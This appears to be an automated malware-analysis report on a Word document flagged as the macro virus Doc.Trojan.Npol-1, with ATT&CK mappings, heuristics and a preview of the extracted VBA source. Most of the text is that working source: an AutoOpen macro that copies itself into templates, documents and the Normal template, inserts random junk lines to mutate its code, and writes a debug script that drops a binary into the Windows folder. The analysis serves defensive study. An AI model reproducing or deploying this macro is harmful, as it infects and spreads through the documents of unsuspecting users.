Verdict: MALICIOUS
Risk Score: 308
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- T1566.001 Phishing: Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, a common technique for executing code as soon as a document is opened. The script attempts to copy itself into other documents and templates, indicating self-propagating (macro virus) behaviour. The presence of Shell() calls and the ClamAV detection strongly suggest malicious intent, most likely spreading malware.
Heuristics (7)
- ClamAV: Doc.Trojan.Npol-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Npol-1
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 66790 bytes |

SHA-256: d4743ad677eefea3d914e4314af70fcf198cab0284d48f1eb11d814e6845fe26
Detection (ClamAV): Doc.Trojan.Npol-1
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script (truncated below)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FF"
Private Sub AutoOpen()
On Error Resume Next
Randomize (Timer)
SpreadDir = Application.Path & "\"
If IF = 19Then LW = 34
Victim = Dir(SpreadDir & "\*.dot")
For H = 1 To 1
Next H
Do Until Victim = ""
SetAttr SpreadDir & Victim, vbNormal
Application.OrganizerCopy ThisDocument.FullName, SpreadDir & Victim, "FF", wdOrganizerObjectProjectItems
Victim = Dir
Loop
Application.OrganizerCopy ThisDocument.FullName, SpreadDir & "\*.doc", "FF", wdOrganizerObjectProjectItems
GoTo C4536B57E
C4536B57E:
SpreadDir = Environ("WINDIR") & "\Recent"
Chk = Dir(recent & "\*.doc")
GoTo D4536B51A
D4536B51A:
If Chk = True Then Application.OrganizerCopy ThisDocument.FullName, SpreadDir & "\*.doc", "FF", wdOrganizerObjectProjectItems
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "FF" Then GoTo AlreadyDone
Next i
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "FF", wdOrganizerObjectProjectItems
AlreadyDone:
If Int(Rnd * 24) > Hour(Time) Then
MorphFactor = Int(Rnd * 10)
Select Case MorphFactor
Case 1
Fake = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 999999999))
Case 2
Fake = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & Chr(58) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(58)
Case 3
Fake = "DoEvents"
Case 4
Fake = "'" & Application.UserName & Application.UserAddress & Application.ActivePrinter
Case 5
JumpPoint = Chr(Int(Rnd * 5) + 65) & Hex(CStr(Oct(MorphFactor ^ 4) & CStr(Day(Date)) & CStr(Minute(Time)) & CStr(Hour(Time))))
Fake = "Goto " & JumpPoint & Chr(13) & JumpPoint & ":"
Case 6
Fake = Chr(13)
Case 7
Fake = "For " & Chr(MorphFactor + 65) & " = 1 To 1" & Chr(13) & "Next " & Chr(MorphFactor + 65)
Case 8
GGHC = 592119693
Fake = "Rem"
Case 9
Fake = "If " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45)) & "Then " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45))
Case 10
Fake = "Do" & Chr(13) & "Exit Do" & Chr(13) & "Loop"
End Select
ThisDocument.VBProject.VBComponents("FF").CodeModule.InsertLines Int(Rnd * ThisDocument.VBProject.VBComponents("FF").CodeModule.CountOfLines - 3) + 1, Fake
End If
Open Environ("WINDIR") & "\System\Bio.tmp" For Output As #1
Print #1, "N " & Environ("WINDIR") & "\System\" & "BIO.JPG"
Print #1, "E 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01 "
Print #1, "E 0110 00 01 00 00 FF DB 00 43 00 35 25 28 2F 28 21 35 "
Print #1, "E 0120 2F 2B 2F 3C 39 35 3F 50 85 57 50 49 49 50 A3 75 "
Print #1, "E 0130 7B 61 85 C1 AA CB C8 BE AA BA B7 D5 F0 FF FF D5 "
Print #1, "E 0140 E2 FF E6 B7 BA FF FF FF FF FF FF FF FF FF CE FF "
Print #1, "E 0150 FF FF FF FF FF FF FF FF FF FF DB 00 43 01 39 3C "
Print #1, "E 0160 3C 50 46 50 9D 57 57 9D FF DC BA DC FF FF FF FF "
Print #1, "E 0170 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF "
Print #1, "E 0180 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF "
Print #1, "E 0190 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF C0 "
Print #1, "E 01A0 00 11 08 00 DB 01 33 03 01 22 00 02 11 01 03 11 "
Print #1, "E 01B0 01 FF C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 "
Print #1, "E 01C0 00 00 00 00 00 00 00 01 02 03 04
... (truncated)